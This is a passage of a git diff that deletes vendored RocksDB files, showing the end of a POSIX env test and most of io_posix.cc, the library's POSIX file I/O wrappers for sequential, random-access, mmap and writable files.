-#if !defined(ROCKSDB_LITE)
-INSTANTIATE_TEST_CASE_P(DefaultEnvWithDirectIO, EnvPosixTestWithParam,
-                        ::testing::Values(std::pair<Env*, bool>(Env::Default(),
-                                                                true)));
-#endif  // !defined(ROCKSDB_LITE)
-
-#if !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-static unique_ptr<Env> chroot_env(NewChrootEnv(Env::Default(),
-                                               test::TmpDir(Env::Default())));
-INSTANTIATE_TEST_CASE_P(
-    ChrootEnvWithoutDirectIO, EnvPosixTestWithParam,
-    ::testing::Values(std::pair<Env*, bool>(chroot_env.get(), false)));
-INSTANTIATE_TEST_CASE_P(
-    ChrootEnvWithDirectIO, EnvPosixTestWithParam,
-    ::testing::Values(std::pair<Env*, bool>(chroot_env.get(), true)));
-#endif  // !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/env/io_posix.cc b/thirdparty/rocksdb/env/io_posix.cc
deleted file mode 100644
index c5b14d3..0000000
--- a/thirdparty/rocksdb/env/io_posix.cc
+++ /dev/null
@@ -1,1028 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifdef ROCKSDB_LIB_IO_POSIX
-#include "env/io_posix.h"
-#include <errno.h>
-#include <fcntl.h>
-#include <algorithm>
-#if defined(OS_LINUX)
-#include <linux/fs.h>
-#endif
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/ioctl.h>
-#include <sys/mman.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#ifdef OS_LINUX
-#include <sys/statfs.h>
-#include <sys/syscall.h>
-#include <sys/sysmacros.h>
-#endif
-#include "env/posix_logger.h"
-#include "monitoring/iostats_context_imp.h"
-#include "port/port.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// A wrapper for fadvise, if the platform doesn't support fadvise,
-// it will simply return 0.
-int Fadvise(int fd, off_t offset, size_t len, int advice) {
-#ifdef OS_LINUX
-  return posix_fadvise(fd, offset, len, advice);
-#else
-  return 0;  // simply do nothing.
-#endif
-}
-
-namespace {
-size_t GetLogicalBufferSize(int __attribute__((__unused__)) fd) {
-#ifdef OS_LINUX
-  struct stat buf;
-  int result = fstat(fd, &buf);
-  if (result == -1) {
-    return kDefaultPageSize;
-  }
-  if (major(buf.st_dev) == 0) {
-    // Unnamed devices (e.g. non-device mounts), reserved as null device number.
-    // These don't have an entry in /sys/dev/block/. Return a sensible default.
-    return kDefaultPageSize;
-  }
-
-  // Reading queue/logical_block_size does not require special permissions.
-  const int kBufferSize = 100;
-  char path[kBufferSize];
-  char real_path[PATH_MAX + 1];
-  snprintf(path, kBufferSize, "/sys/dev/block/%u:%u", major(buf.st_dev),
-           minor(buf.st_dev));
-  if (realpath(path, real_path) == nullptr) {
-    return kDefaultPageSize;
-  }
-  std::string device_dir(real_path);
-  if (!device_dir.empty() && device_dir.back() == '/') {
-    device_dir.pop_back();
-  }
-  // NOTE: sda3 does not have a `queue/` subdir, only the parent sda has it.
-  // $ ls -al '/sys/dev/block/8:3'
-  // lrwxrwxrwx. 1 root root 0 Jun 26 01:38 /sys/dev/block/8:3 ->
-  // ../../block/sda/sda3
-  size_t parent_end = device_dir.rfind('/', device_dir.length() - 1);
-  if (parent_end == std::string::npos) {
-    return kDefaultPageSize;
-  }
-  size_t parent_begin = device_dir.rfind('/', parent_end - 1);
-  if (parent_begin == std::string::npos) {
-    return kDefaultPageSize;
-  }
-  if (device_dir.substr(parent_begin + 1, parent_end - parent_begin - 1) !=
-      "block") {
-    device_dir = device_dir.substr(0, parent_end);
-  }
-  std::string fname = device_dir + "/queue/logical_block_size";
-  FILE* fp;
-  size_t size = 0;
-  fp = fopen(fname.c_str(), "r");
-  if (fp != nullptr) {
-    char* line = nullptr;
-    size_t len = 0;
-    if (getline(&line, &len, fp) != -1) {
-      sscanf(line, "%zu", &size);
-    }
-    free(line);
-    fclose(fp);
-  }
-  if (size != 0 && (size & (size - 1)) == 0) {
-    return size;
-  }
-#endif
-  return kDefaultPageSize;
-}
-} //  namespace
-
-/*
- * DirectIOHelper
- */
-#ifndef NDEBUG
-namespace {
-
-bool IsSectorAligned(const size_t off, size_t sector_size) {
-  return off % sector_size == 0;
-}
-
-bool IsSectorAligned(const void* ptr, size_t sector_size) {
-  return uintptr_t(ptr) % sector_size == 0;
-}
-
-}
-#endif
-
-/*
- * PosixSequentialFile
- */
-PosixSequentialFile::PosixSequentialFile(const std::string& fname, FILE* file,
-                                         int fd, const EnvOptions& options)
-    : filename_(fname),
-      file_(file),
-      fd_(fd),
-      use_direct_io_(options.use_direct_reads),
-      logical_sector_size_(GetLogicalBufferSize(fd_)) {
-  assert(!options.use_direct_reads || !options.use_mmap_reads);
-}
-
-PosixSequentialFile::~PosixSequentialFile() {
-  if (!use_direct_io()) {
-    assert(file_);
-    fclose(file_);
-  } else {
-    assert(fd_);
-    close(fd_);
-  }
-}
-
-Status PosixSequentialFile::Read(size_t n, Slice* result, char* scratch) {
-  assert(result != nullptr && !use_direct_io());
-  Status s;
-  size_t r = 0;
-  do {
-    r = fread_unlocked(scratch, 1, n, file_);
-  } while (r == 0 && ferror(file_) && errno == EINTR);
-  *result = Slice(scratch, r);
-  if (r < n) {
-    if (feof(file_)) {
-      // We leave status as ok if we hit the end of the file
-      // We also clear the error so that the reads can continue
-      // if a new data is written to the file
-      clearerr(file_);
-    } else {
-      // A partial read with an error: return a non-ok status
-      s = IOError("While reading file sequentially", filename_, errno);
-    }
-  }
-  return s;
-}
-
-Status PosixSequentialFile::PositionedRead(uint64_t offset, size_t n,
-                                           Slice* result, char* scratch) {
-  if (use_direct_io()) {
-    assert(IsSectorAligned(offset, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(n, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(scratch, GetRequiredBufferAlignment()));
-  }
-  Status s;
-  ssize_t r = -1;
-  size_t left = n;
-  char* ptr = scratch;
-  assert(use_direct_io());
-  while (left > 0) {
-    r = pread(fd_, ptr, left, static_cast<off_t>(offset));
-    if (r <= 0) {
-      if (r == -1 && errno == EINTR) {
-        continue;
-      }
-      break;
-    }
-    ptr += r;
-    offset += r;
-    left -= r;
-    if (r % static_cast<ssize_t>(GetRequiredBufferAlignment()) != 0) {
-      // Bytes reads don't fill sectors. Should only happen at the end
-      // of the file.
-      break;
-    }
-  }
-  if (r < 0) {
-    // An error: return a non-ok status
-    s = IOError(
-        "While pread " + ToString(n) + " bytes from offset " + ToString(offset),
-        filename_, errno);
-  }
-  *result = Slice(scratch, (r < 0) ? 0 : n - left);
-  return s;
-}
-
-Status PosixSequentialFile::Skip(uint64_t n) {
-  if (fseek(file_, static_cast<long int>(n), SEEK_CUR)) {
-    return IOError("While fseek to skip " + ToString(n) + " bytes", filename_,
-                   errno);
-  }
-  return Status::OK();
-}
-
-Status PosixSequentialFile::InvalidateCache(size_t offset, size_t length) {
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  if (!use_direct_io()) {
-    // free OS pages
-    int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-    if (ret != 0) {
-      return IOError("While fadvise NotNeeded offset " + ToString(offset) +
-                         " len " + ToString(length),
-                     filename_, errno);
-    }
-  }
-  return Status::OK();
-#endif
-}
-
-/*
- * PosixRandomAccessFile
- */
-#if defined(OS_LINUX)
-size_t PosixHelper::GetUniqueIdFromFile(int fd, char* id, size_t max_size) {
-  if (max_size < kMaxVarint64Length * 3) {
-    return 0;
-  }
-
-  struct stat buf;
-  int result = fstat(fd, &buf);
-  assert(result != -1);
-  if (result == -1) {
-    return 0;
-  }
-
-  long version = 0;
-  result = ioctl(fd, FS_IOC_GETVERSION, &version);
-  TEST_SYNC_POINT_CALLBACK("GetUniqueIdFromFile:FS_IOC_GETVERSION", &result);
-  if (result == -1) {
-    return 0;
-  }
-  uint64_t uversion = (uint64_t)version;
-
-  char* rid = id;
-  rid = EncodeVarint64(rid, buf.st_dev);
-  rid = EncodeVarint64(rid, buf.st_ino);
-  rid = EncodeVarint64(rid, uversion);
-  assert(rid >= id);
-  return static_cast<size_t>(rid - id);
-}
-#endif
-
-#if defined(OS_MACOSX) || defined(OS_AIX)
-size_t PosixHelper::GetUniqueIdFromFile(int fd, char* id, size_t max_size) {
-  if (max_size < kMaxVarint64Length * 3) {
-    return 0;
-  }
-
-  struct stat buf;
-  int result = fstat(fd, &buf);
-  if (result == -1) {
-    return 0;
-  }
-
-  char* rid = id;
-  rid = EncodeVarint64(rid, buf.st_dev);
-  rid = EncodeVarint64(rid, buf.st_ino);
-  rid = EncodeVarint64(rid, buf.st_gen);
-  assert(rid >= id);
-  return static_cast<size_t>(rid - id);
-}
-#endif
-/*
- * PosixRandomAccessFile
- *
- * pread() based random-access
- */
-PosixRandomAccessFile::PosixRandomAccessFile(const std::string& fname, int fd,
-                                             const EnvOptions& options)
-    : filename_(fname),
-      fd_(fd),
-      use_direct_io_(options.use_direct_reads),
-      logical_sector_size_(GetLogicalBufferSize(fd_)) {
-  assert(!options.use_direct_reads || !options.use_mmap_reads);
-  assert(!options.use_mmap_reads || sizeof(void*) < 8);
-}
-
-PosixRandomAccessFile::~PosixRandomAccessFile() { close(fd_); }
-
-Status PosixRandomAccessFile::Read(uint64_t offset, size_t n, Slice* result,
-                                   char* scratch) const {
-  if (use_direct_io()) {
-    assert(IsSectorAligned(offset, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(n, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(scratch, GetRequiredBufferAlignment()));
-  }
-  Status s;
-  ssize_t r = -1;
-  size_t left = n;
-  char* ptr = scratch;
-  while (left > 0) {
-    r = pread(fd_, ptr, left, static_cast<off_t>(offset));
-    if (r <= 0) {
-      if (r == -1 && errno == EINTR) {
-        continue;
-      }
-      break;
-    }
-    ptr += r;
-    offset += r;
-    left -= r;
-    if (use_direct_io() &&
-        r % static_cast<ssize_t>(GetRequiredBufferAlignment()) != 0) {
-      // Bytes reads don't fill sectors. Should only happen at the end
-      // of the file.
-      break;
-    }
-  }
-  if (r < 0) {
-    // An error: return a non-ok status
-    s = IOError(
-        "While pread offset " + ToString(offset) + " len " + ToString(n),
-        filename_, errno);
-  }
-  *result = Slice(scratch, (r < 0) ? 0 : n - left);
-  return s;
-}
-
-Status PosixRandomAccessFile::Prefetch(uint64_t offset, size_t n) {
-  Status s;
-  if (!use_direct_io()) {
-    ssize_t r = 0;
-#ifdef OS_LINUX
-    r = readahead(fd_, offset, n);
-#endif
-#ifdef OS_MACOSX
-    radvisory advice;
-    advice.ra_offset = static_cast<off_t>(offset);
-    advice.ra_count = static_cast<int>(n);
-    r = fcntl(fd_, F_RDADVISE, &advice);
-#endif
-    if (r == -1) {
-      s = IOError("While prefetching offset " + ToString(offset) + " len " +
-                      ToString(n),
-                  filename_, errno);
-    }
-  }
-  return s;
-}
-
-#if defined(OS_LINUX) || defined(OS_MACOSX) || defined(OS_AIX)
-size_t PosixRandomAccessFile::GetUniqueId(char* id, size_t max_size) const {
-  return PosixHelper::GetUniqueIdFromFile(fd_, id, max_size);
-}
-#endif
-
-void PosixRandomAccessFile::Hint(AccessPattern pattern) {
-  if (use_direct_io()) {
-    return;
-  }
-  switch (pattern) {
-    case NORMAL:
-      Fadvise(fd_, 0, 0, POSIX_FADV_NORMAL);
-      break;
-    case RANDOM:
-      Fadvise(fd_, 0, 0, POSIX_FADV_RANDOM);
-      break;
-    case SEQUENTIAL:
-      Fadvise(fd_, 0, 0, POSIX_FADV_SEQUENTIAL);
-      break;
-    case WILLNEED:
-      Fadvise(fd_, 0, 0, POSIX_FADV_WILLNEED);
-      break;
-    case DONTNEED:
-      Fadvise(fd_, 0, 0, POSIX_FADV_DONTNEED);
-      break;
-    default:
-      assert(false);
-      break;
-  }
-}
-
-Status PosixRandomAccessFile::InvalidateCache(size_t offset, size_t length) {
-  if (use_direct_io()) {
-    return Status::OK();
-  }
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  // free OS pages
-  int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-  if (ret == 0) {
-    return Status::OK();
-  }
-  return IOError("While fadvise NotNeeded offset " + ToString(offset) +
-                     " len " + ToString(length),
-                 filename_, errno);
-#endif
-}
-
-/*
- * PosixMmapReadableFile
- *
- * mmap() based random-access
- */
-// base[0,length-1] contains the mmapped contents of the file.
-PosixMmapReadableFile::PosixMmapReadableFile(const int fd,
-                                             const std::string& fname,
-                                             void* base, size_t length,
-                                             const EnvOptions& options)
-    : fd_(fd), filename_(fname), mmapped_region_(base), length_(length) {
-  fd_ = fd_ + 0;  // suppress the warning for used variables
-  assert(options.use_mmap_reads);
-  assert(!options.use_direct_reads);
-}
-
-PosixMmapReadableFile::~PosixMmapReadableFile() {
-  int ret = munmap(mmapped_region_, length_);
-  if (ret != 0) {
-    fprintf(stdout, "failed to munmap %p length %" ROCKSDB_PRIszt " \n",
-            mmapped_region_, length_);
-  }
-}
-
-Status PosixMmapReadableFile::Read(uint64_t offset, size_t n, Slice* result,
-                                   char* scratch) const {
-  Status s;
-  if (offset > length_) {
-    *result = Slice();
-    return IOError("While mmap read offset " + ToString(offset) +
-                       " larger than file length " + ToString(length_),
-                   filename_, EINVAL);
-  } else if (offset + n > length_) {
-    n = static_cast<size_t>(length_ - offset);
-  }
-  *result = Slice(reinterpret_cast<char*>(mmapped_region_) + offset, n);
-  return s;
-}
-
-Status PosixMmapReadableFile::InvalidateCache(size_t offset, size_t length) {
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  // free OS pages
-  int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-  if (ret == 0) {
-    return Status::OK();
-  }
-  return IOError("While fadvise not needed. Offset " + ToString(offset) +
-                     " len" + ToString(length),
-                 filename_, errno);
-#endif
-}
-
-/*
- * PosixMmapFile
- *
- * We preallocate up to an extra megabyte and use memcpy to append new
- * data to the file.  This is safe since we either properly close the
- * file before reading from it, or for log files, the reading code
- * knows enough to skip zero suffixes.
- */
-Status PosixMmapFile::UnmapCurrentRegion() {
-  TEST_KILL_RANDOM("PosixMmapFile::UnmapCurrentRegion:0", rocksdb_kill_odds);
-  if (base_ != nullptr) {
-    int munmap_status = munmap(base_, limit_ - base_);
-    if (munmap_status != 0) {
-      return IOError("While munmap", filename_, munmap_status);
-    }
-    file_offset_ += limit_ - base_;
-    base_ = nullptr;
-    limit_ = nullptr;
-    last_sync_ = nullptr;
-    dst_ = nullptr;
-
-    // Increase the amount we map the next time, but capped at 1MB
-    if (map_size_ < (1 << 20)) {
-      map_size_ *= 2;
-    }
-  }
-  return Status::OK();
-}
-
-Status PosixMmapFile::MapNewRegion() {
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  assert(base_ == nullptr);
-  TEST_KILL_RANDOM("PosixMmapFile::UnmapCurrentRegion:0", rocksdb_kill_odds);
-  // we can't fallocate with FALLOC_FL_KEEP_SIZE here
-  if (allow_fallocate_) {
-    IOSTATS_TIMER_GUARD(allocate_nanos);
-    int alloc_status = fallocate(fd_, 0, file_offset_, map_size_);
-    if (alloc_status != 0) {
-      // fallback to posix_fallocate
-      alloc_status = posix_fallocate(fd_, file_offset_, map_size_);
-    }
-    if (alloc_status != 0) {
-      return Status::IOError("Error allocating space to file : " + filename_ +
-                             "Error : " + strerror(alloc_status));
-    }
-  }
-
-  TEST_KILL_RANDOM("PosixMmapFile::Append:1", rocksdb_kill_odds);
-  void* ptr = mmap(nullptr, map_size_, PROT_READ | PROT_WRITE, MAP_SHARED, fd_,
-                   file_offset_);
-  if (ptr == MAP_FAILED) {
-    return Status::IOError("MMap failed on " + filename_);
-  }
-  TEST_KILL_RANDOM("PosixMmapFile::Append:2", rocksdb_kill_odds);
-
-  base_ = reinterpret_cast<char*>(ptr);
-  limit_ = base_ + map_size_;
-  dst_ = base_;
-  last_sync_ = base_;
-  return Status::OK();
-#else
-  return Status::NotSupported("This platform doesn't support fallocate()");
-#endif
-}
-
-Status PosixMmapFile::Msync() {
-  if (dst_ == last_sync_) {
-    return Status::OK();
-  }
-  // Find the beginnings of the pages that contain the first and last
-  // bytes to be synced.
-  size_t p1 = TruncateToPageBoundary(last_sync_ - base_);
-  size_t p2 = TruncateToPageBoundary(dst_ - base_ - 1);
-  last_sync_ = dst_;
-  TEST_KILL_RANDOM("PosixMmapFile::Msync:0", rocksdb_kill_odds);
-  if (msync(base_ + p1, p2 - p1 + page_size_, MS_SYNC) < 0) {
-    return IOError("While msync", filename_, errno);
-  }
-  return Status::OK();
-}
-
-PosixMmapFile::PosixMmapFile(const std::string& fname, int fd, size_t page_size,
-                             const EnvOptions& options)
-    : filename_(fname),
-      fd_(fd),
-      page_size_(page_size),
-      map_size_(Roundup(65536, page_size)),
-      base_(nullptr),
-      limit_(nullptr),
-      dst_(nullptr),
-      last_sync_(nullptr),
-      file_offset_(0) {
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  allow_fallocate_ = options.allow_fallocate;
-  fallocate_with_keep_size_ = options.fallocate_with_keep_size;
-#endif
-  assert((page_size & (page_size - 1)) == 0);
-  assert(options.use_mmap_writes);
-  assert(!options.use_direct_writes);
-}
-
-PosixMmapFile::~PosixMmapFile() {
-  if (fd_ >= 0) {
-    PosixMmapFile::Close();
-  }
-}
-
-Status PosixMmapFile::Append(const Slice& data) {
-  const char* src = data.data();
-  size_t left = data.size();
-  while (left > 0) {
-    assert(base_ <= dst_);
-    assert(dst_ <= limit_);
-    size_t avail = limit_ - dst_;
-    if (avail == 0) {
-      Status s = UnmapCurrentRegion();
-      if (!s.ok()) {
-        return s;
-      }
-      s = MapNewRegion();
-      if (!s.ok()) {
-        return s;
-      }
-      TEST_KILL_RANDOM("PosixMmapFile::Append:0", rocksdb_kill_odds);
-    }
-
-    size_t n = (left <= avail) ? left : avail;
-    assert(dst_);
-    memcpy(dst_, src, n);
-    dst_ += n;
-    src += n;
-    left -= n;
-  }
-  return Status::OK();
-}
-
-Status PosixMmapFile::Close() {
-  Status s;
-  size_t unused = limit_ - dst_;
-
-  s = UnmapCurrentRegion();
-  if (!s.ok()) {
-    s = IOError("While closing mmapped file", filename_, errno);
-  } else if (unused > 0) {
-    // Trim the extra space at the end of the file
-    if (ftruncate(fd_, file_offset_ - unused) < 0) {
-      s = IOError("While ftruncating mmaped file", filename_, errno);
-    }
-  }
-
-  if (close(fd_) < 0) {
-    if (s.ok()) {
-      s = IOError("While closing mmapped file", filename_, errno);
-    }
-  }
-
-  fd_ = -1;
-  base_ = nullptr;
-  limit_ = nullptr;
-  return s;
-}
-
-Status PosixMmapFile::Flush() { return Status::OK(); }
-
-Status PosixMmapFile::Sync() {
-  if (fdatasync(fd_) < 0) {
-    return IOError("While fdatasync mmapped file", filename_, errno);
-  }
-
-  return Msync();
-}
-
-/**
- * Flush data as well as metadata to stable storage.
- */
-Status PosixMmapFile::Fsync() {
-  if (fsync(fd_) < 0) {
-    return IOError("While fsync mmaped file", filename_, errno);
-  }
-
-  return Msync();
-}
-
-/**
- * Get the size of valid data in the file. This will not match the
- * size that is returned from the filesystem because we use mmap
- * to extend file by map_size every time.
- */
-uint64_t PosixMmapFile::GetFileSize() {
-  size_t used = dst_ - base_;
-  return file_offset_ + used;
-}
-
-Status PosixMmapFile::InvalidateCache(size_t offset, size_t length) {
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  // free OS pages
-  int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-  if (ret == 0) {
-    return Status::OK();
-  }
-  return IOError("While fadvise NotNeeded mmapped file", filename_, errno);
-#endif
-}
-
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-Status PosixMmapFile::Allocate(uint64_t offset, uint64_t len) {
-  assert(offset <= std::numeric_limits<off_t>::max());
-  assert(len <= std::numeric_limits<off_t>::max());
-  TEST_KILL_RANDOM("PosixMmapFile::Allocate:0", rocksdb_kill_odds);
-  int alloc_status = 0;
-  if (allow_fallocate_) {
-    alloc_status = fallocate(
-        fd_, fallocate_with_keep_size_ ? FALLOC_FL_KEEP_SIZE : 0,
-          static_cast<off_t>(offset), static_cast<off_t>(len));
-  }
-  if (alloc_status == 0) {
-    return Status::OK();
-  } else {
-    return IOError(
-        "While fallocate offset " + ToString(offset) + " len " + ToString(len),
-        filename_, errno);
-  }
-}
-#endif
-
-/*
- * PosixWritableFile
- *
- * Use posix write to write data to a file.
- */
-PosixWritableFile::PosixWritableFile(const std::string& fname, int fd,
-                                     const EnvOptions& options)
-    : filename_(fname),
-      use_direct_io_(options.use_direct_writes),
-      fd_(fd),
-      filesize_(0),
-      logical_sector_size_(GetLogicalBufferSize(fd_)) {
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  allow_fallocate_ = options.allow_fallocate;
-  fallocate_with_keep_size_ = options.fallocate_with_keep_size;
-#endif
-  assert(!options.use_mmap_writes);
-}
-
-PosixWritableFile::~PosixWritableFile() {
-  if (fd_ >= 0) {
-    PosixWritableFile::Close();
-  }
-}
-
-Status PosixWritableFile::Append(const Slice& data) {
-  if (use_direct_io()) {
-    assert(IsSectorAligned(data.size(), GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(data.data(), GetRequiredBufferAlignment()));
-  }
-  const char* src = data.data();
-  size_t left = data.size();
-  while (left != 0) {
-    ssize_t done = write(fd_, src, left);
-    if (done < 0) {
-      if (errno == EINTR) {
-        continue;
-      }
-      return IOError("While appending to file", filename_, errno);
-    }
-    left -= done;
-    src += done;
-  }
-  filesize_ += data.size();
-  return Status::OK();
-}
-
-Status PosixWritableFile::PositionedAppend(const Slice& data, uint64_t offset) {
-  if (use_direct_io()) {
-    assert(IsSectorAligned(offset, GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(data.size(), GetRequiredBufferAlignment()));
-    assert(IsSectorAligned(data.data(), GetRequiredBufferAlignment()));
-  }
-  assert(offset <= std::numeric_limits<off_t>::max());
-  const char* src = data.data();
-  size_t left = data.size();
-  while (left != 0) {
-    ssize_t done = pwrite(fd_, src, left, static_cast<off_t>(offset));
-    if (done < 0) {
-      if (errno == EINTR) {
-        continue;
-      }
-      return IOError("While pwrite to file at offset " + ToString(offset),
-                     filename_, errno);
-    }
-    left -= done;
-    offset += done;
-    src += done;
-  }
-  filesize_ = offset;
-  return Status::OK();
-}
-
-Status PosixWritableFile::Truncate(uint64_t size) {
-  Status s;
-  int r = ftruncate(fd_, size);
-  if (r < 0) {
-    s = IOError("While ftruncate file to size " + ToString(size), filename_,
-                errno);
-  } else {
-    filesize_ = size;
-  }
-  return s;
-}
-
-Status PosixWritableFile::Close() {
-  Status s;
-
-  size_t block_size;
-  size_t last_allocated_block;
-  GetPreallocationStatus(&block_size, &last_allocated_block);
-  if (last_allocated_block > 0) {
-    // trim the extra space preallocated at the end of the file
-    // NOTE(ljin): we probably don't want to surface failure as an IOError,
-    // but it will be nice to log these errors.
-    int dummy __attribute__((unused));
-    dummy = ftruncate(fd_, filesize_);
-#if defined(ROCKSDB_FALLOCATE_PRESENT) && !defined(TRAVIS)
-    // in some file systems, ftruncate only trims trailing space if the
-    // new file size is smaller than the current size. Calling fallocate
-    // with FALLOC_FL_PUNCH_HOLE flag to explicitly release these unused
-    // blocks. FALLOC_FL_PUNCH_HOLE is supported on at least the following
-    // filesystems:
-    //   XFS (since Linux 2.6.38)
-    //   ext4 (since Linux 3.0)
-    //   Btrfs (since Linux 3.7)
-    //   tmpfs (since Linux 3.5)
-    // We ignore error since failure of this operation does not affect
-    // correctness.
-    // TRAVIS - this code does not work on TRAVIS filesystems.
-    // the FALLOC_FL_KEEP_SIZE option is expected to not change the size
-    // of the file, but it does. Simple strace report will show that.
-    // While we work with Travis-CI team to figure out if this is a
-    // quirk of Docker/AUFS, we will comment this out.
-    struct stat file_stats;
-    int result = fstat(fd_, &file_stats);
-    // After ftruncate, we check whether ftruncate has the correct behavior.
-    // If not, we should hack it with FALLOC_FL_PUNCH_HOLE
-    if (result == 0 &&
-        (file_stats.st_size + file_stats.st_blksize - 1) /
-            file_stats.st_blksize !=
-        file_stats.st_blocks / (file_stats.st_blksize / 512)) {
-      IOSTATS_TIMER_GUARD(allocate_nanos);
-      if (allow_fallocate_) {
-        fallocate(fd_, FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE, filesize_,
-                  block_size * last_allocated_block - filesize_);
-      }
-    }
-#endif
-  }
-
-  if (close(fd_) < 0) {
-    s = IOError("While closing file after writing", filename_, errno);
-  }
-  fd_ = -1;
-  return s;
-}
-
-// write out the cached data to the OS cache
-Status PosixWritableFile::Flush() { return Status::OK(); }
-
-Status PosixWritableFile::Sync() {
-  if (fdatasync(fd_) < 0) {
-    return IOError("While fdatasync", filename_, errno);
-  }
-  return Status::OK();
-}
-
-Status PosixWritableFile::Fsync() {
-  if (fsync(fd_) < 0) {
-    return IOError("While fsync", filename_, errno);
-  }
-  return Status::OK();
-}
-
-bool PosixWritableFile::IsSyncThreadSafe() const { return true; }
-
-uint64_t PosixWritableFile::GetFileSize() { return filesize_; }
-
-Status PosixWritableFile::InvalidateCache(size_t offset, size_t length) {
-  if (use_direct_io()) {
-    return Status::OK();
-  }
-#ifndef OS_LINUX
-  return Status::OK();
-#else
-  // free OS pages
-  int ret = Fadvise(fd_, offset, length, POSIX_FADV_DONTNEED);
-  if (ret == 0) {
-    return Status::OK();
-  }
-  return IOError("While fadvise NotNeeded", filename_, errno);
-#endif
-}
-
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-Status PosixWritableFile::Allocate(uint64_t offset, uint64_t len) {
-  assert(offset <= std::numeric_limits<off_t>::max());
-  assert(len <= std::numeric_limits<off_t>::max());
-  TEST_KILL_RANDOM("PosixWritableFile::Allocate:0", rocksdb_kill_odds);
-  IOSTATS_TIMER_GUARD(allocate_nanos);
-  int alloc_status = 0;
-  if (allow_fallocate_) {
-    alloc_status = fallocate(
-        fd_, fallocate_with_keep_size_ ? FALLOC_FL_KEEP_SIZE : 0,
-        static_cast<off_t>(offset), static_cast<off_t>(len));
-  }
-  if (alloc_status == 0) {
-    return Status::OK();
-  } else {
-    return IOError(
-        "While fallocate offset " + ToString(offset) + " len " + ToString(len),
-        filename_, errno);
-  }
-}
-#endif
-
-#ifdef ROCKSDB_RANGESYNC_PRESENT
-Status PosixWritableFile::RangeSync(uint64_t offset, uint64_t nbytes) {
-  assert(offset <= std::numeric_limits<off_t>::max());
-  assert(nbytes <= std::numeric_limits<off_t>::max());
-  if (sync_file_range(fd_, static_cast<off_t>(offset),
-      static_cast<off_t>(nbytes), SYNC_FILE_RANGE_WRITE) == 0) {
-    return Status::OK();
-  } else {
-    return IOError("While sync_file_range offset " + ToString(offset) +
-                       " bytes " + ToString(nbytes),
-                   filename_, errno);
-  }
-}
-#endif
-
-#ifdef OS_LINUX
-size_t PosixWritableFile::GetUniqueId(char* id, size_t max_size) const {
-  return PosixHelper::GetUniqueIdFromFile(fd_, id, max_size);
-}
-#endif
-
-/*
- * PosixRandomRWFile
- */
-
-PosixRandomRWFile::PosixRandomRWFile(const std::string& fname, int fd,
-                                     const EnvOptions& options)
-    : filename_(fname), fd_(fd) {}
-
-PosixRandomRWFile::~PosixRandomRWFile() {
-  if (fd_ >= 0) {
-    Close();
-  }
-}
-
-Status PosixRandomRWFile::Write(uint64_t offset, const Slice& data) {
-  const char* src = data.data();
-  size_t left = data.size();
-  while (left != 0) {
-    ssize_t done = pwrite(fd_, src, left, offset);
-    if (done < 0) {
-      // error while writing to file
-      if (errno == EINTR) {
-        // write was interrupted, try again.
-        continue;
-      }
-      return IOError(
-          "While write random read/write file at offset " + ToString(offset),
-          filename_, errno);
-    }
-
-    // Wrote `done` bytes
-    left -= done;
-    offset += done;
-    src += done;
-  }
-
-  return Status::OK();
-}
-
-Status PosixRandomRWFile::Read(uint64_t offset, size_t n, Slice* result,
-                               char* scratch) const {
-  size_t left = n;
-  char* ptr = scratch;
-  while (left > 0) {
-    ssize_t done = pread(fd_, ptr, left, offset);
-    if (done < 0) {
-      // error while reading from file
-      if (errno == EINTR) {
-        // read was interrupted, try again.
-        continue;
-      }
-      return IOError("While reading random read/write file offset " +
-                         ToString(offset) + " len " + ToString(n),
-                     filename_, errno);
-    } else if (done == 0) {
-      // Nothing more to read
-      break;
-    }
-
-    // Read `done` bytes
-    ptr += done;
-    offset += done;
-    left -= done;
-  }
-
-  *result = Slice(scratch, n - left);
-  return Status::OK();
-}
-
-Status PosixRandomRWFile::Flush() { return Status::OK(); }
-
-Status PosixRandomRWFile::Sync() {
-  if (fdatasync(fd_) < 0) {
-    return IOError("While fdatasync random read/write file", filename_, errno);
-  }
-  return Status::OK();
-}
-
-Status PosixRandomRWFile::Fsync() {
-  if (fsync(fd_) < 0) {
-    return IOError("While fsync random read/write file", filename_, errno);
-  }
-  return Status::OK();
-}
-
-Status PosixRandomRWFile::Close() {
-  if (close(fd_) < 0) {
-    return IOError("While close random read/write file", filename_, errno);
-  }
-  fd_ = -1;
-  return Status::OK();
-}
-
-/*
- * PosixDirectory
- */
-
-PosixDirectory::~PosixDirectory() { close(fd_); }
-
